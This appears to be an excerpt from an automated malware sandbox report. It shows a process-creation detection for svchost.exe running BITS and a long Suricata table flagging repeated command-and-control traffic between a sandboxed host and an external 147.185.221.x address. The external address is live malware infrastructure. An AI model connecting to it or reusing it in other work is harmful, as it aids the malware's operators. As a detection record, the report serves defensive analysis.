                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5972, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:18.466044+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:10:20.273606+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:10:31.251747+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:10:42.299919+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:10:48.476096+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:10:53.264210+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:04.264224+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:08.131437+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:11.346520+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:11.576846+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:14.890089+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:18.464123+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:24.043968+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:27.348191+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:30.590024+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:35.950638+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:36.606552+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:47.676746+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:48.477615+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:54.378834+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550006TCP
                      2024-10-13T19:11:58.926948+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:12:01.992633+020028528701Malware Command and Control Activity Detected147.185.221.231764192.168.2.550012TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:15.078852+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.188293+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.313309+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.422440+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.532050+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.641355+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.750972+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.860004+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.969569+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.079336+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.205022+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.316692+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.427050+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.578175+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.695457+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.797420+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.906878+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.016201+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.128719+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.234860+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.346314+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.453708+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.563041+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.672353+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.781825+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.891198+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.000556+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.109958+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.219825+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.328686+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.438264+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.547331+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.656869+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.766303+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.883111+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.984954+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.094263+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.203672+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.313245+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.422488+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.531810+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.641208+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.754672+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.906384+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.020435+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.146821+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.250635+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.275420+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:10:20.359975+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.475752+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.578733+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.688627+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.797421+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.907327+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.016390+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.322396+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.438037+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.547493+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.656787+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.766218+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.875705+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.985119+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.094395+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.203753+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.313246+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.423146+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.534177+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.641319+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.750749+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.862206+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:22.969318+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.079072+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.188200+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.297392+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.412850+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.531938+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.641148+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.750876+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:23.865113+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.034558+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.142796+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.251143+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.360109+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.688174+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.797597+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:24.907070+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.016320+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.125843+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.235085+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.344688+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.453565+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.563222+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.672740+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.797299+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:25.907191+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.016148+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.386871+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.656496+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.774530+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:26.891179+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.001058+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.110190+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.225738+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.328633+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.441793+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.563602+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.672557+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.785245+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:27.893044+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.001761+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.112394+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.231497+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.344338+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.454492+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.567769+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.676054+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.782045+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:28.893427+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:29.008754+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:29.194886+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.257087+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.359948+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.469891+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.593763+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.703591+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.860163+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:30.987403+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.094276+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.251866+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.254053+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:10:31.344278+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.453754+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.563001+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.672488+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.781906+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:31.891067+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.000546+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.148597+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.221476+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.328704+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.438081+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.547770+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.672464+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.804279+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:32.950881+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.063078+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.172267+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.557001+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.735678+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.844344+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:33.953755+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.070879+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.172310+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.297574+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.406743+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.516177+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.627227+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.745194+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.860016+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:34.970202+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.078796+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.187959+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.319678+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.437958+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.547473+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.656909+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.766133+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:35.895762+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.000667+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.109893+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.222217+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.342893+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.455920+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.579311+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.812917+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.814522+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:36.923428+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.031792+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.141115+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.250654+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.367628+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.485001+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.594352+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.714350+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.832050+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:37.938164+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.050712+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.157202+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.291012+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.406634+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.516430+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.626599+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.747269+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.866560+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:38.984777+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.096261+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.204463+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.314260+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.429368+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.547364+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.672949+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.813179+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:39.928482+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.047604+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.158321+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.297413+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.406814+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.516062+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.625603+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.745684+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.859773+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:40.969346+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.111048+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.250573+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.359748+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.494957+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.837602+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:41.980895+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.134508+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.250604+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.304368+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:10:42.369942+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.491871+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.609775+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.739813+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.874248+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:42.984999+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.109877+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.220918+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.328652+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.438175+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.558839+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.672279+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.781912+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:43.938252+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.047606+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.156670+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.266365+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:44.375616+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
